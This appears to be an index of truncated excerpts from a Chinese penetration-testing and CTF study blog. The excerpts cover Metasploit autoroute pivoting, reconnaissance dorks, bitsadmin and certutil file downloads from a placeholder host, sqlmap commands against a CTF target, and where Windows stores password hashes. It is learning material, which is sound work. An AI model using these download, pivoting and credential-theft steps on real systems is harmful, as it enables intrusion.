https://www.zhixi.com/view/5ca77153

代理socks分类反向代理代理服务器理解： 典型例子nginx 用于实现网站的负载均衡，安全防护音隐藏服务器的ip正向代理代理客户端理解： 可以参考clash 并不能代理google，而是通过代理自己从而访问google工具msf核心操作： 写路由，通过获取到的meterpreter 进行run autoroute -s ip段，类似于手动添加路由表 使用socks_proxy 模

简介这个只是为了深刻记录代理原理，所以尝试再做一次。 并且全程只使用msf 的代理 重点就是，多个路由，一个代理通过这一个代理，就可以访问多层内网，但是必须在对应的metepreter 设置路由，可以直接为路由表，然后进行转发 信息收集 ip 查询 端口扫描 网站信息收集 访问 路径 找到一个flag? 查看版本 存在nginx web渗透 利用thinkphp 1/index

mindmap 信息收集域名子域名收集工具oneforallpython oneforall.py –target ip/域名 runhack语法常用的语法 站点： site inurl 可以用于web 目录 intext 在正文中查询 intitle 在标题中查找 filetype 过滤文件类型 pdf,word,xls,ppt,image,jepg 网络空间搜索

文件下载windwosrundll32.exe 加载hta文件cscript.exe 加载vbs文件 bitsadmins缺点只能下载真正的http服务优点windwos自带的指令bitsadmin /transfer task_name http://ip:port/file filepathcertutil缺点需要进行两个操作，首先是下载，然后是清楚缓存指令下载:certuti

web文章管理系统这个是一个sql注入 0x00 使用的知识点 sql 注入 0x01 出现id 0x02 爆破数据库 1python sqlmap.py -u http://challenge.qsnctf.com:32112?id=1 --dbs 发现ctftraining 1python sqlmap.py -u http://challenge.qsnctf.com:321

简介本文件用于记录每天刷题 2024-02-28 [NSSRound#8 Basic]MyDoor https://www.nssctf.cn/problem/3483 [MoeCTF 2021]babyRCE https://www.nssctf.cn/problem/3409 2024-02-29 青少年ctf比赛 青少年CTF - AU9U5T (tsy244.github.i

简介开始时间： 2024-02-28 结束时间：  2024-03-02 总结时间 2024-03-02 环境搭建网络设置 发现需要两个内网网段和一个外网网段 通过nat 网卡模拟外网 web1 ubuntu 密码 web : web2021 web2 ubuntu 密码 ubuntu : ubuntu pc1 win7 密码 bunny：Bunny2021

常规问题记录 windows 密码保存的位置 对于单个主机来说 c:\windows\system32\config\SAM 对于域环境来说的话 c:\windwos\NTDS\NTDS.dit powershell Powershell渗透框架 - AU9U5T (tsy244.github.io) 几率很大的两个问题 powershell 默认执行策略 Restricted

简介开启时间: 2024-02-23 17:24 环境搭建靶机下载地址: 漏洞详情 基本就是win7 双网卡，模拟出网，进网 记得修改网络的配置，记得改成自动 密码win7sun\heart 123.comwin7内域用户登录Administratordc123.com 进入系统密码123.com 2008sun\admin 2020.com进入系统密码：2020.com 细节搭建win7